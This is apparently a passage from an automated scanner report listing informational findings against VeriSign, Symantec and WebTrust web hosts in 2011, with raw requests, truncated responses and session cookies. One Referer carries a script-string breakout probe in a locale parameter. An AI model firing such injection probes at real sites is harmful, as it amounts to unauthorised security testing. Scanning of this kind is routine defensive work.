GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, publicContent-Type: text/html Vary: Accept-Encoding Age: 73854 Date: Fri, 09 Sep 2011 21:25:44 GMT Expires: Sun, 09 Oct 2011 18:24:34 GMT Content-Length: 1356 Connection: keep-alive /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
22.4. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/shared.js
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, publicContent-Type: text/html Vary: Accept-Encoding Age: 69510 Date: Fri, 09 Sep 2011 21:24:45 GMT Expires: Sun, 09 Oct 2011 05:58:30 GMT Content-Length: 37327 Connection: keep-alive // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
22.5. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/en_us/assets/shared/js/google-analytics.js
Request
GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:52 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 69191 Expires: Sun, 09 Oct 2011 02:25:41 GMT Content-Length: 461 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scr...[SNIP]...
22.6. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/flyouts.js
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
22.7. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/header.js
Request
GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 1558 /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
22.8. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/jquery.autocomplete.js
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:44 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 14 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 J..rn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
22.9. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/home/js/home.js
Request
GET /authweb/global/assets/home/js/home.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:48 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 16 Expires: Sun, 09 Oct 2011 21:38:32 GMT Content-Length: 2725 /******************************************* ** HP specific functions ** *******************************************/ //External link functionality $('a[rel="external"]').click(funct...[SNIP]...
22.10. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/global-preload.js
Request
GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 69230 Expires: Sun, 09 Oct 2011 02:24:38 GMT Content-Length: 135518 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the M...[SNIP]...
22.11. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/google-analytics.js
Request
GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 471 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElemen...[SNIP]...
22.12. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.boxshadow.js
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:27 GMT Content-Length: 1538 /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
22.13. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:27 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 1 Expires: Sun, 09 Oct 2011 21:38:26 GMT Content-Length: 1356 /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
22.14. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 39037 Expires: Sun, 09 Oct 2011 10:47:51 GMT Content-Length: 1614 /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
22.15. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/oo-engine.js
Request
GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 1154 /* OnlineOpinion (S3tS v3.1) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,...[SNIP]...
22.16. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:35 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 77341 Expires: Sun, 09 Oct 2011 00:09:34 GMT Content-Length: 4102 var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
22.17. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/shared.js
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:29 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:29 GMT Content-Length: 37327 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
22.18. https://cert.webtrust.org/ViewSeal
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cert.webtrust.org
Path:
/ViewSeal
Request
GET /ViewSeal HTTP/1.1 Host: cert.webtrust.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:30 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Connection: closeContent-Type: text/html Content-Length: 2834 java.lang.NumberFormatException: null at java.lang.Integer.parseInt(Integer.java:394) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29) ...[SNIP]...
22.19. https://enterprise-ssl-admin.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://enterprise-ssl-admin.verisign.com
Path:
/
Request
GET / HTTP/1.1 Host: enterprise-ssl-admin.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:41:53 GMT Content-length: 1304Content-type: text/html Connection: close <HTML> <HEAD> <TITLE>HTTP 403 Forbidden: Invalid Certificate for Client Authentication</TITLE> <link href="../stylesheet.css" rel="stylesheet" type="text/css" /> </HEAD> <BODY> <table width=720 bord...[SNIP]...
22.20. https://fileconnect.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/
Request
GET / HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:04:07 GMT Content-length: 11587Content-type: text/html Content-Language: en-US <HTML><HEAD><TITLE>Symantec FileConnect - Electronic Software Distribution</TITLE> <!--[if IE]> <LINK REL=StyleSheet HREF="javascript/stylesie.css" TYPE="text/css" MEDIA=screen> <![endif]...[SNIP]...
22.21. https://fileconnect.symantec.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/favicon.ico
Request
GET /favicon.ico HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451
Response
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:04:04 GMT Content-length: 1214Content-type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He...[SNIP]...
22.22. https://fileconnect.symantec.com/javascript/common.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/common.js
Request
GET /javascript/common.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:55 GMT Content-length: 1214Content-type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He...[SNIP]...
22.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Request
GET /support/ssl-certificates-support/index HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache-Coyote/1.1Content-Type: text/html Connection: close <!-- <script type="text/javascript" language="javascript"> window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404"; //--> </script>
22.24. https://knowledge.verisign.com/support/code-signing-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index
Request
GET /support/code-signing-support/index HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 09 Sep 2011 21:44:29 GMT Server: Apache-Coyote/1.1Content-Type: text/html Connection: close <!-- <script type="text/javascript" language="javascript"> window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404"; //--> </script>
22.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index
Request
GET /support/mpki-for-ssl-support/index HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 09 Sep 2011 21:44:38 GMT Server: Apache-Coyote/1.1Content-Type: text/html Connection: close <!-- <script type="text/javascript" language="javascript"> window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404"; //--> </script>
22.26. https://knowledge.verisign.com/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index
Request
GET /support/ssl-certificates-support/index HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 09 Sep 2011 21:43:54 GMT Server: Apache-Coyote/1.1Content-Type: text/html Connection: close <!-- <script type="text/javascript" language="javascript"> window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404"; //--> </script>
22.27. http://partnerlocator.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/
Request
GET / HTTP/1.1 Host: partnerlocator.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 503 Service Temporarily Unavailable Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:46:04 GMTContent-Type: text/html Content-Length: 615 Connection: close <html> <head><title>503 Service Temporarily Unavailable</title></head> <body bgcolor="white"> <center><h1>503 Service Temporarily Unavailable</h1></center> <hr><center>nginx/0.8.54</center> </bod...[SNIP]...
22.28. http://partnerlocator.symantec.com/public/product_finder
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/public/product_finder
Request
GET /public/product_finder HTTP/1.1 Host: partnerlocator.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:45:58 GMTContent-Type: text/html Connection: close Content-Length: 34 <h1>500 Internal Server Error</h1>
22.29. http://partnerlocator.symantec.com/public/pulldown_list
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/public/pulldown_list
Request
GET /public/pulldown_list;plist=country;search_term=un;country=;locale=en-us;container=pulldown_list;value_id=country;text_id=country_name HTTP/1.1 Host: partnerlocator.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search X-Prototype-Version: 1.5.0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; 